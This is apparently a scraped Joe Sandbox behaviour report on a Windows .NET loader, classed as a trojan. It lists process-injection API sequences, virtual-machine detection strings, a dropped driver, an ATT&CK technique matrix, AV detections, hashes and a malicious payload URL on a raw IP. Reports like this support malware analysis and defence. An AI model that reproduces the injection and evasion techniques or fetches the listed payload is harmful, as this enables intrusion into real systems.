    Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Chrome/HEADIsWow64Processkernel32X:\Windows\SysWOW64\ntdll.dllntdll.dllRtlInitUnicodeStringZwOpenFileZwCreateSectionZwMapViewOfSectionNtUnmapViewOfSectionNtQueryInformationProcess{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}RtlRandomExntdll:y--\Driver\Device ParametersEDID(IsActive)(NotActive)BAD EDID!No EDID!--Nm:SYSTEM\ControlSet001\Enum\DISPLAY\\.\PhysicalDrive%d---VMwareVirtualBoxVBoxQEMUDisplay AdapterNon-PnPVMwareVirtualBoxVBoxQEMUWestern Disk HARDDISK(1):(2):text/*Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00405700 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00405700
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00402CB0 _memset,_memset,_wcscpy_s,_wcscat_s,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetLastError,LoadLibraryW,GetProcAddress,_wcschr,_wcscpy_s,GetComputerNameW,CredUIParseUserNameW,CoTaskMemFree,7_2_00402CB0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_004039C0 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,7_2_004039C0
    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00407219 SetUnhandledExceptionFilter,7_2_00407219
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00405700 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00405700
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040C52A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0040C52A
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_02B53C44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_02B53C44

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 40D000Jump to behavior
    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 413000Jump to behavior
    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 416000Jump to behavior
    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 418000Jump to behavior
    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: A98008Jump to behavior
    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_02B522F0 GetProcessHeap,HeapAlloc,StrCatW,StrCatW,StrCatW,StrCatW,CreateProcessW,GetThreadContext,GetProcessHeap,HeapAlloc,VirtualQueryEx,WriteProcessMemory,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,TerminateProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,7_2_02B522F0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00402050 _memset,_memset,_memset,_memset,_memset,__wcsicmp,__wcsicmp,__wcsicmp,SetEnvironmentVariableW,_memset,_wcscpy_s,_wcscat_s,CreateProcessW,GetLastError,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,_wcscpy_s,_memset,_memset,_memset,CreateProcessWithLogonW,GetLastError,EnumWindows,Sleep,Sleep,EnumWindows,CloseHandle,CloseHandle,CloseHandle,LoadIconW,LoadIconW,LoadIconW,LoadCursorW,RegisterClassExW,CreateDialogParamW,GetMessageW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetMessageW,LocalFree,7_2_00402050
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,7_2_0040B123
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040C66D cpuid 7_2_0040C66D
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00407ACC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00407ACC
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_004039C0 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,7_2_004039C0
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    1
    Valid Accounts
    2
    Native API
    1
    Valid Accounts
    1
    Valid Accounts
    1
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services11
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/Job2
    Windows Service
    1
    Exploitation for Privilege Escalation
    1
    Valid Accounts
    LSASS Memory121
    Security Software Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)1
    Bootkit
    1
    Access Token Manipulation
    1
    Access Token Manipulation
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)2
    LSASS Driver
    2
    Windows Service
    1
    Disable or Modify Tools
    NTDS121
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon Script311
    Process Injection
    121
    Virtualization/Sandbox Evasion
    LSA Secrets34
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.common2
    LSASS Driver
    311
    Process Injection
    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Deobfuscate/Decode Files or Information
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
    Obfuscated Files or Information
    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
    Bootkit
    /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)11
    Software Packing
    Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 862324 Sample: file.exe Startdate: 09/05/2023 Architecture: WINDOWS Score: 100 23 Multi AV Scanner detection for domain / URL 2->23 25 Antivirus detection for URL or domain 2->25 27 Multi AV Scanner detection for submitted file 2->27 29 4 other signatures 2->29 6 file.exe 4 4 2->6         started        process3 file4 19 C:\Users\user\AppData\Local\Temp\?????.sys, PE32+ 6->19 dropped 21 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 6->21 dropped 31 Writes to foreign memory regions 6->31 33 Sample is not signed and drops a device driver 6->33 35 Injects a PE file into a foreign processes 6->35 10 AddInProcess32.exe 6->10         started        13 jsc.exe 6->13         started        15 mscorsvw.exe 6->15         started        17 4 other processes 6->17 signatures5 process6 signatures7 37 Contains functionality to infect the boot sector 10->37 39 Contain functionality to detect virtual machines 10->39 41 Contains functionality to inject code into remote processes 10->41

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    file.exe14%ReversingLabsWin64.Trojan.CrypterX
    file.exe20%VirustotalBrowse
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\?????.sys0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\?????.sys1%VirustotalBrowse
    SourceDetectionScannerLabelLinkDownload
    0.2.file.exe.1c5babf0000.0.unpack100%AviraHEUR/AGEN.1363250Download File
    7.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Patched.GenDownload File
    7.2.AddInProcess32.exe.2b50000.4.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd0%URL Reputationsafe
    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
    https://sectigo.com/CPS00%URL Reputationsafe
    http://ocsp.sectigo.com00%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
    https://www.sysinternals.com00%URL Reputationsafe
    http://109.206.241.33/files/1un.config.CfgEncFile17%VirustotalBrowse
    http://109.206.241.33/files/1un.config.CfgEncFile100%Avira URL Cloudmalware
    http://109.206.241.33/files/1un.config.CfgEncFileMZ100%Avira URL Cloudmalware
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://109.206.241.33/files/1un.config.CfgEncFileAddInProcess32.exefalse
    • 17%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://www.sysinternals.comAddInProcess32.exefalse
      high
      http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmdAddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tfile.exefalse
      • URL Reputation: safe
      unknown
      https://sectigo.com/CPS0file.exefalse
      • URL Reputation: safe
      unknown
      http://ocsp.sectigo.com0file.exefalse
      • URL Reputation: safe
      unknown
      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#file.exefalse
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      https://www.sysinternals.com0?????.sys.0.drfalse
      • URL Reputation: safe
      unknown
      http://109.206.241.33/files/1un.config.CfgEncFileMZAddInProcess32.exe, 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.392608147.0000000002B40000.00000040.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      No contacted IP infos
      Joe Sandbox Version:37.1.0 Beryl
      Analysis ID:862324
      Start date and time:2023-05-09 17:28:16 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 32s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:8
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample file name:file.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@15/2@0/0
      EGA Information:
      • Successful, ratio: 50%
      HDC Information:
      • Successful, ratio: 59.8% (good quality ratio 55.9%)
      • Quality average: 75.4%
      • Quality standard deviation: 30.2%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 9
      • Number of non-executed functions: 42
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Stop behavior analysis, all processes terminated
      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      No simulations
      No context
      No context
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Users\user\AppData\Local\Temp\?????.sysRef_PO#29968.exeGet hashmaliciousUnknownBrowse
        file.exeGet hashmaliciouslgoogLoaderBrowse
          HSCANNER.exeGet hashmaliciousFormBookBrowse
            HSBC_Bank_MT_103_Transfer_Copy_PDF.exeGet hashmaliciousAgentTeslaBrowse
              Weekly_stock_list_0805.exeGet hashmaliciousAgentTeslaBrowse
                file.exeGet hashmaliciouslgoogLoaderBrowse
                  fBXNicB12R.exeGet hashmaliciouslgoogLoaderBrowse
                    file.exeGet hashmaliciouslgoogLoaderBrowse
                      a.exeGet hashmaliciousAmadey, AveMaria, Nitol, RedLine, Remcos, SmokeLoader, UACMeBrowse
                        file.exeGet hashmaliciouslgoogLoaderBrowse
                          m6JO0XiaWy.exeGet hashmaliciouslgoogLoaderBrowse
                            file.exeGet hashmaliciouslgoogLoaderBrowse
                              O8GyuZeT3P.exeGet hashmaliciousVidarBrowse
                                file.exeGet hashmaliciouslgoogLoaderBrowse
                                  file.exeGet hashmaliciouslgoogLoaderBrowse
                                    nMIdIHOO7E.exeGet hashmaliciousAmadey, RedLineBrowse
                                      file.exeGet hashmaliciouslgoogLoaderBrowse
                                        file.exeGet hashmaliciouslgoogLoaderBrowse
                                          Narud#U017eba_za_26.04.2023..exeGet hashmaliciousFormBookBrowse
                                            file.exeGet hashmaliciouslgoogLoaderBrowse
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1461
                                              Entropy (8bit):5.375805902953795
                                              Encrypted:false
                                              SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhgLE4qXKIE4TKD1KoZAE4KKPaE4j:MxHKn1qHGiD0HKeGiYHKGD8AogLHitHa
                                              MD5:FC337EAC93C651C01D02B16E6905B397
                                              SHA1:08320670A665B3FC68812A0E1B318EE7CBCE5FC7
                                              SHA-256:695A51EE0DEB584A229313C044E5C00B77DF6DD53CCF0059E9B59729F425BA9C
                                              SHA-512:DCE9712EBCCAC70000AD03055531EA9B3ED32C8017AEB0C40BDCE823C04DD3821B3C204B95AEDAF34A1C51FCCDE50A5F5C891686540E951B05D4BE2EE5A9BD6C
                                              Malicious:true
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):36208
                                              Entropy (8bit):6.284053631838433
                                              Encrypted:false
                                              SSDEEP:768:tKCM0IWRhm8LiES4cT4iZ923OMqUD6Q4KICJw4:t7/Vhzb3pL4GJw4
                                              MD5:97E3A44EC4AE58C8CC38EEFC613E950E
                                              SHA1:BC47E15537FA7C32DFEFD23168D7E1741F8477ED
                                              SHA-256:440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
                                              SHA-512:8EF7FC489B6FFED9EC14746E526AE87F44C39D5EAFFF0D4C3BFA0B3F0D28450F76D1066F446C766F4C9A20842A7F084FE4A9F94659D5487EA88959FCCB2A96EB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                              Joe Sandbox View:
                                              • Filename: Ref_PO#29968.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: HSCANNER.exe, Detection: malicious, Browse
                                              • Filename: HSBC_Bank_MT_103_Transfer_Copy_PDF.exe, Detection: malicious, Browse
                                              • Filename: Weekly_stock_list_0805.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: fBXNicB12R.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: a.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: m6JO0XiaWy.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: O8GyuZeT3P.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: nMIdIHOO7E.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: Narud#U017eba_za_26.04.2023..exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.{.w.{.w.{.~...p.{.w.z.H.{.~...t.{.~...t.{.~...t.{."...v.{."..v.{.".y.v.{.Richw.{.........PE..d...l..a.........." .....L..........X.......................................................................................................x...(............`.......l..p!......0....I..T............................................@...............................text....%.......&.................. ..h.rdata.......@.......*..............@..H.data...,....P.......:..............@....pdata.......`.......<..............@..HPAGE.........p.......@.............. ..`INIT.................\.............. ..b.rsrc................f..............@..B.reloc..0............j..............@..B................................................................................................................................................................................................
                                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):4.25642365152462
                                              TrID:
                                              • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                              • Win64 Executable GUI (202006/5) 46.43%
                                              • Win64 Executable (generic) (12005/4) 2.76%
                                              • Generic Win/DOS Executable (2004/3) 0.46%
                                              • DOS Executable Generic (2002/1) 0.46%
                                              File name:file.exe
                                              File size:1338216
                                              MD5:851dfeb9035473532d796a9b41608b3c
                                              SHA1:beca84bb1ffd0146f8e5b87a01b14b42e8d50e2b
                                              SHA256:5867c5321292565fa017f4e88b6c4894572d7fa557e9a0ddb1ced4362413b6b3
                                              SHA512:4768571679e045a2dbcb80ffe1dab9f97bc4c17ccb2cb2f2e8598e0afebaa7443b8ca027763cce7643def7321a63692b053ee5a9d17d0ac04a160ba8ed0f83f7
                                              SSDEEP:12288:GbnXLRzlUCodzOurH+pRCK4ZLnfbygqOpOFXZ4NdbEfEruuDavFUWY5A3IRQgnnt:GrtqRUZYSh8t7ejqQLeCYCBuQ1vr3c
                                              TLSH:ED5549343AFA502AB173EFA54AE479E6DA6FB7733B07641D109103864723A41EDC193E
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....EYd.........."...0.uG..r............ ....@...... ...............................O....`................................
                                              Icon Hash:00828e8e8686b000
                                              Entrypoint:0x400000
                                              Entrypoint Section:
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6459450E [Mon May 8 18:53:02 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:
                                              Signature Valid:false
                                              Signature Issuer:C=CN, CN=upwork Ltd
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 5/9/2023 4:24:15 PM 5/9/2024 4:24:15 PM
                                              Subject Chain
                                              • C=CN, CN=upwork Ltd
                                              Version:3
                                              Thumbprint MD5:A86456CED00CE864F111465433283811
                                              Thumbprint SHA-1:63D1D89606D2435239469D3297AE241286EFECF1
                                              Thumbprint SHA-256:B7685122944B6F0B2D1D9CE39052B0828E9DF559E202EC48CCAFA4ED02538262
                                              Serial:432AD609F49E1629E7D765061BCE3A61
                                              Instruction
                                              dec ebp
                                              pop edx
                                              nop
                                              add byte ptr [ebx], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1480000x872.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1454000x1768
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1466ec0x1c.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x1447750x144800False0.46086527349768874data4.225065680038577IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x1480000x8720xa00False0.3484375data3.5753513989958745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0x1480a00x5e8data
                                              RT_MANIFEST0x1486880x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                              No network behavior found
                                              Target ID:0
                                              Start time:17:29:12
                                              Start date:09/05/2023
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Desktop\file.exe
                                              Imagebase:0x1c5babf0000
                                              File size:1338216 bytes
                                              MD5 hash:851DFEB9035473532D796A9B41608B3C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low
                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                              Target ID:1
                                              Start time:17:29:49
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
                                              Imagebase:0xa0000
                                              File size:46688 bytes
                                              MD5 hash:2B40A449D6034F41771A460DADD53A60
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:2
                                              Start time:17:29:50
                                              Start date:09/05/2023
